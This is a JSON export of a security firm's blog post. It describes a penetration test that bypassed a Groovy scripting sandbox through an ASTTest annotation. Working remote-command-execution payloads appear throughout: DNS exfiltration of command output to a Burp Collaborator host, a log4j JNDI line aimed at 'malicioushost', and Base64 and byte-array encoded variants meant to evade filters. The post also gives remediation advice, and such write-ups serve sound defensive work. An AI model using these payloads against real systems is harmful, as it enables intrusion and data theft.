{"id":1173,"date":"2022-09-07T12:27:46","date_gmt":"2022-09-07T10:27:46","guid":{"rendered":"https:\/\/security.humanativaspa.it\/?p=1173"},"modified":"2025-09-15T13:32:03","modified_gmt":"2025-09-15T13:32:03","slug":"groovy-template-engine-exploitation-notes-from-a-real-case-scenario","status":"publish","type":"post","link":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/","title":{"rendered":"Groovy Template Engine Exploitation &#8211; Notes from a real case scenario"},"content":{"rendered":"<p><strong>Java web applications<\/strong> are far from dead in the enterprise world and with them often come multiple <strong>fancy RCE opportunities<\/strong> for attackers. In particular, template engines processing and expression languages capable features (Groovy, Velocity&#8230;) are usually a good place to start to discover this kind of vulnerabilities.<\/p>\n<p>In one of our last penetration testing engagements for a customer, the target application allowed specific users to use a <b>sandboxed Groovy scripting environment<\/b> in order to populate some areas of the application with dynamic content. Since the same application had already undergone testing by a competitor, the capabilities of the Goovy shell were limited by some server-side checks and the attack vectors commonly used to achieve an easy Remote Command Execution were blocked (resulting in a generic Java exception).<\/p>\n<p>So, no <em>&#8220;calc.exe&#8221;.exec()<\/em> nor <em>&#8220;calc.exe&#8221;.execute()<\/em> :\\<\/p>\n<p>But also no:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">java.lang.Runtime.getRuntime().exec(\"calc\")\r\nthis.evaluate(\"'calc'.execute()\")<\/pre>\n<p>So we tried to be creative and tested something more complex with reflection, trying also to access local files in addition to the usual RCE:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">\"aaa\".getClass().forName(\"java.lang.Runtime\").getDeclaredMethods()[15].invoke(\"calc.exe\")\r\nthis.getClass().forName(\"java.io.File\").getDeclaredMethods()[35].invoke(this.getClass().forName(\"java.io.File\").getDeclaredConstructors()[5].newInstance(\"C:\\\\windows\\\\\"))<\/pre>\n<p>Also NOPE :\\<\/p>\n<p>Everything appeared blocked, including any straightforward method to access local files or web resources like:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">new File('c:\/windows\/win.ini').text\r\nnew URL(\"http:\/\/www.google.com\").getText()<\/pre>\n<p>So, we tried to be even more creative but most of our ideas required to instantiate new objects. Unfortunately after (more than) a couple of tries we realized that <strong>we couldn&#8217;t instantiate any new object<\/strong>, not just the &#8220;dangerous&#8221; ones (so no &#8220;new&#8221; keyword).<\/p>\n<p>Consequently, we had to find another way to get the objects we needed!<\/p>\n<p>We started investigating which objects were accessible by our scripting environment, to check if something useful could be found there. In this kind of environment, often the context of the script has access to juicy objects that leak additional information on backend resources. Some examples are the following:<\/p>\n<p>&#8211; Info on the actual scripting environment<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">println \"${Script.properties}\"\r\nprintln \"${this.properties}\"\r\nprintln \"${GroovyShell.properties}\"<\/pre>\n<p>&#8211; Info on the system itself<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">println System.getProperty(\"user.name\")\r\nprintln System.getProperty(\"java.home\")\r\nprintln System.getProperty(\"java.runtime.version\")<\/pre>\n<p>Since we couldn&#8217;t instantiate any new object, we started looking for already-instantiated objects accessible from our context. Our first try was to look at any <em>java.lang.File<\/em> objects present in our context, in order to maybe obtain configuration files or other juicy files, for example. Even better (but less likely) a <em>ClassLoader<\/em> object to load an arbitrary class. But no luck. Unfortunately, excluding some information on the underlying system, nothing was useful enough to achieve an RCE or file write\/read.<\/p>\n<p>However, all the tests we executed were not completely useless because they allowed us to understand that <strong>what blocked us was a Security Manager<\/strong> quite well-configured (and not some ad-hoc backend checks on blacklisted inputs).<\/p>\n<p>So, we needed a way to bypass the Security Manager! And after multiple researches we found an interesting thread on <a href=\"https:\/\/stackoverflow.com\/questions\/64559260\/how-to-prevent-disable-ast-transformations-in-groovy-scripts\">StackOverflow<\/a> and the referenced <a href=\"https:\/\/github.com\/welk1n\/exploiting-groovy-in-Java\">Github repository<\/a>.<\/p>\n<p><img decoding=\"async\" class=\"transparent aligncenter\" src=\"https:\/\/i.kym-cdn.com\/photos\/images\/newsfeed\/001\/493\/280\/38e.png\" alt=\"https:\/\/i.kym-cdn.com\/photos\/images\/newsfeed\/001\/493\/280\/38e.png\" \/><\/p>\n<p>The suggested payload seemed very promising, since it used very basic Groovy syntax and did not require any exotic library:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"whoami\")}) \r\ndef x<\/pre>\n<p>The payload &#8220;as is&#8221; did not work (of course!) because in our specific scenario it required an import, easily fixable with <em>import groovy.*;<\/em> .<\/p>\n<p>Aaaand BOOM! <strong>The sandbox was bypassed<\/strong> \ud83d\ude00\u00a0 (good job <em>welk1n <\/em>! you deserve way more glory for your work!)<\/p>\n<p>We confirmed the remote command execution via DNS resolution (using BurpSuite collaborator server), since we weren&#8217;t able to read the output directly:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">import groovy.*;\r\n\r\n@groovy.transform.ASTTest(value={\r\ncmd = \"ping cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net \"\r\nassert java.lang.Runtime.getRuntime().exec(cmd.split(\" \"))\r\n})\r\ndef x<\/pre>\n<p>A good way to retrieve the output of the injected commands via this out-of-band channel in our limited scenario is the following:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">import groovy.*;\r\n\r\n@groovy.transform.ASTTest(value={\r\ncmd = \"whoami\";\r\nout = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmd.split(\" \")).getInputStream()).useDelimiter(\"\\\\A\").next()\r\ncmd2 = \"ping \" + out.replaceAll(\"[^a-zA-Z0-9]\",\"\") + \".cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net\";\r\njava.lang.Runtime.getRuntime().exec(cmd2.split(\" \"))\r\n})\r\ndef x<\/pre>\n<p>A variation of the previous payload that does not use Java annotations (in case for any reason you cannot use them) but that requires to instantiate new objects is the following:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">new groovy.lang.GroovyClassLoader().parseClass(\"@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\\\"calc.exe\\\")})def x\")<\/pre>\n<p>There can be many other viable ways to achieve the same result, depending on what we can do with the scripting engine and also on which libraries are present. As an example on this latter point, if the notorious log4j library is present, we might try to achieve RCE using a payload like this one (not tested, it may contain errors):<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">org.apache.log4j.Logger.getLogger(this.getClass()).info(\"${jndi:ldap:\/\/malicioushost\/a}\"<\/pre>\n<p>To remediate the described vulnerability, since it&#8217;s very hard to prevent every possible attack vector, the safest solution is obviously to <strong>remove the Groovy scripting engine \ud83d\ude00<\/strong>\u00a0 If this is not possible, a less radical approach would be to run the scripting engine on a different system, such as a sandboxed OS or a Docker container.<\/p>\n<p><b>NB: The answer to this <\/b><a style=\"font-weight: bold;\" href=\"https:\/\/stackoverflow.com\/a\/64577926\">StackOverflow question<\/a><b> to fix the vulnerability won&#8217;t work , since it&#8217;s almost always possible to bypass that kind of controls using encoding:<\/b><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">this.evaluate(new String(java.util.Base64.getDecoder().decode(\"QGdyb292eS50cmFuc2Zvcm0uQVNUVGVzdCh2YWx1ZT17YXNzZXJ0IGphdmEubGFuZy5SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKCJpZCIpfSlkZWYgeA==\")))<\/pre>\n<p><strong>even without string literals:<\/strong><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"groovy\">this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 114, 97, 110, 115, 102, 111, 114, 109, 46, 65, 83, 84, 84, 101, 115, 116, 40, 118, 97, 108, 117, 101, 61, 123, 97, 115, 115, 101, 114, 116, 32, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101, 46, 103, 101, 116, 82,117, 110, 116, 105, 109, 101, 40, 41, 46, 101, 120, 101, 99, 40, 34, 105, 100, 34, 41, 125, 41, 100, 101, 102, 32, 120}))<\/pre>\n<p>For the ones who managed to read the whole blog post and want to dig further in the Groovy &#8220;sorcery&#8221;, <a href=\"https:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/#_safer_scripting\">here<\/a> you can find the official documentation.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Java web applications are far from dead in the enterprise world and with them often come multiple fancy RCE opportunities [&hellip;]<\/p>\n","protected":false},"author":6,"featured_media":159919,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[78,91],"tags":[115,125,126,127,128,129,130,160,105],"class_list":["post-1173","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-exploits","category-articles","tag-web","tag-el","tag-el-injection","tag-groovy","tag-rce","tag-security-manager","tag-template-injection","tag-log4j","tag-java"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>HN Security Groovy Template Engine Exploitation - Notes from a real case scenario<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"HN Security Groovy Template Engine Exploitation - Notes from a real case scenario\" \/>\n<meta property=\"og:description\" content=\"Java web applications are far from dead in the enterprise world and with them often come multiple fancy RCE opportunities [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/\" \/>\n<meta property=\"og:site_name\" content=\"HN Security\" \/>\n<meta property=\"article:published_time\" content=\"2022-09-07T10:27:46+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-09-15T13:32:03+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"836\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Gianluca Baldi\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@hnsec\" \/>\n<meta name=\"twitter:site\" content=\"@hnsec\" \/>\n<meta name=\"twitter:label1\" content=\"Scritto da\" \/>\n\t<meta name=\"twitter:data1\" content=\"Gianluca Baldi\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/\"},\"author\":{\"name\":\"Gianluca Baldi\",\"@id\":\"https:\/\/hnsecurity.it\/it\/#\/schema\/person\/251b6740cfa820dd94ab485c48adb8f5\"},\"headline\":\"Groovy Template Engine Exploitation &#8211; Notes from a real case scenario\",\"datePublished\":\"2022-09-07T10:27:46+00:00\",\"dateModified\":\"2025-09-15T13:32:03+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/\"},\"wordCount\":771,\"publisher\":{\"@id\":\"https:\/\/hnsecurity.it\/it\/#organization\"},\"image\":{\"@id\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg\",\"keywords\":[\"web\",\"EL\",\"EL Injection\",\"groovy\",\"RCE\",\"Security Manager\",\"Template Injection\",\"log4j\",\"Java\"],\"articleSection\":[\"Exploits\",\"Articles\"],\"inLanguage\":\"it-IT\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/\",\"url\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/\",\"name\":\"HN Security Groovy Template Engine Exploitation - Notes from a real case scenario\",\"isPartOf\":{\"@id\":\"https:\/\/hnsecurity.it\/it\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg\",\"datePublished\":\"2022-09-07T10:27:46+00:00\",\"dateModified\":\"2025-09-15T13:32:03+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#primaryimage\",\"url\":\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg\",\"contentUrl\":\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg\",\"width\":1600,\"height\":836,\"caption\":\"Groovy logo\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/hnsecurity.it\/it\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Groovy Template Engine Exploitation &#8211; Notes from a real case scenario\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/hnsecurity.it\/it\/#website\",\"url\":\"https:\/\/hnsecurity.it\/it\/\",\"name\":\"HN Security\",\"description\":\"Offensive Security Specialists\",\"publisher\":{\"@id\":\"https:\/\/hnsecurity.it\/it\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/hnsecurity.it\/it\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/hnsecurity.it\/it\/#organization\",\"name\":\"HN Security\",\"url\":\"https:\/\/hnsecurity.it\/it\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/hnsecurity.it\/it\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2026\/01\/hn-libellula.jpg\",\"contentUrl\":\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2026\/01\/hn-libellula.jpg\",\"width\":696,\"height\":696,\"caption\":\"HN Security\"},\"image\":{\"@id\":\"https:\/\/hnsecurity.it\/it\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/hnsec\",\"https:\/\/www.linkedin.com\/company\/hnsecurity\/\",\"https:\/\/github.com\/hnsecurity\",\"https:\/\/infosec.exchange\/@hnsec\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/hnsecurity.it\/it\/#\/schema\/person\/251b6740cfa820dd94ab485c48adb8f5\",\"name\":\"Gianluca Baldi\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/secure.gravatar.com\/avatar\/6c4f5412911567e4668543570703da4320bfcc5f3dcb1c89541bd2d7eb285690?s=96&d=mm&r=g\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6c4f5412911567e4668543570703da4320bfcc5f3dcb1c89541bd2d7eb285690?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6c4f5412911567e4668543570703da4320bfcc5f3dcb1c89541bd2d7eb285690?s=96&d=mm&r=g\",\"caption\":\"Gianluca Baldi\"},\"url\":\"https:\/\/hnsecurity.it\/it\/blog\/author\/gianluca-baldi\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"HN Security Groovy Template Engine Exploitation - Notes from a real case scenario","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/","og_locale":"it_IT","og_type":"article","og_title":"HN Security Groovy Template Engine Exploitation - Notes from a real case scenario","og_description":"Java web applications are far from dead in the enterprise world and with them often come multiple fancy RCE opportunities [&hellip;]","og_url":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/","og_site_name":"HN Security","article_published_time":"2022-09-07T10:27:46+00:00","article_modified_time":"2025-09-15T13:32:03+00:00","og_image":[{"width":1600,"height":836,"url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg","type":"image\/jpeg"}],"author":"Gianluca Baldi","twitter_card":"summary_large_image","twitter_creator":"@hnsec","twitter_site":"@hnsec","twitter_misc":{"Scritto da":"Gianluca Baldi","Tempo di lettura stimato":"5 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#article","isPartOf":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/"},"author":{"name":"Gianluca Baldi","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/person\/251b6740cfa820dd94ab485c48adb8f5"},"headline":"Groovy Template Engine Exploitation &#8211; Notes from a real case scenario","datePublished":"2022-09-07T10:27:46+00:00","dateModified":"2025-09-15T13:32:03+00:00","mainEntityOfPage":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/"},"wordCount":771,"publisher":{"@id":"https:\/\/hnsecurity.it\/it\/#organization"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#primaryimage"},"thumbnailUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg","keywords":["web","EL","EL Injection","groovy","RCE","Security Manager","Template Injection","log4j","Java"],"articleSection":["Exploits","Articles"],"inLanguage":"it-IT"},{"@type":"WebPage","@id":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/","url":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/","name":"HN Security Groovy Template Engine Exploitation - Notes from a real case scenario","isPartOf":{"@id":"https:\/\/hnsecurity.it\/it\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#primaryimage"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#primaryimage"},"thumbnailUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg","datePublished":"2022-09-07T10:27:46+00:00","dateModified":"2025-09-15T13:32:03+00:00","breadcrumb":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#primaryimage","url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg","contentUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg","width":1600,"height":836,"caption":"Groovy logo"},{"@type":"BreadcrumbList","@id":"https:\/\/hnsecurity.it\/it\/blog\/groovy-template-engine-exploitation-notes-from-a-real-case-scenario\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hnsecurity.it\/it\/"},{"@type":"ListItem","position":2,"name":"Groovy Template Engine Exploitation &#8211; Notes from a real case scenario"}]},{"@type":"WebSite","@id":"https:\/\/hnsecurity.it\/it\/#website","url":"https:\/\/hnsecurity.it\/it\/","name":"HN Security","description":"Offensive Security Specialists","publisher":{"@id":"https:\/\/hnsecurity.it\/it\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hnsecurity.it\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Organization","@id":"https:\/\/hnsecurity.it\/it\/#organization","name":"HN Security","url":"https:\/\/hnsecurity.it\/it\/","logo":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/logo\/image\/","url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2026\/01\/hn-libellula.jpg","contentUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2026\/01\/hn-libellula.jpg","width":696,"height":696,"caption":"HN Security"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/hnsec","https:\/\/www.linkedin.com\/company\/hnsecurity\/","https:\/\/github.com\/hnsecurity","https:\/\/infosec.exchange\/@hnsec"]},{"@type":"Person","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/person\/251b6740cfa820dd94ab485c48adb8f5","name":"Gianluca Baldi","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/secure.gravatar.com\/avatar\/6c4f5412911567e4668543570703da4320bfcc5f3dcb1c89541bd2d7eb285690?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/6c4f5412911567e4668543570703da4320bfcc5f3dcb1c89541bd2d7eb285690?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6c4f5412911567e4668543570703da4320bfcc5f3dcb1c89541bd2d7eb285690?s=96&d=mm&r=g","caption":"Gianluca Baldi"},"url":"https:\/\/hnsecurity.it\/it\/blog\/author\/gianluca-baldi\/"}]}},"jetpack_featured_media_url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/GROOVY.jpg","_links":{"self":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/1173","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/comments?post=1173"}],"version-history":[{"count":1,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/1173\/revisions"}],"predecessor-version":[{"id":160155,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/1173\/revisions\/160155"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/media\/159919"}],"wp:attachment":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/media?parent=1173"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/categories?post=1173"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/tags?post=1173"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}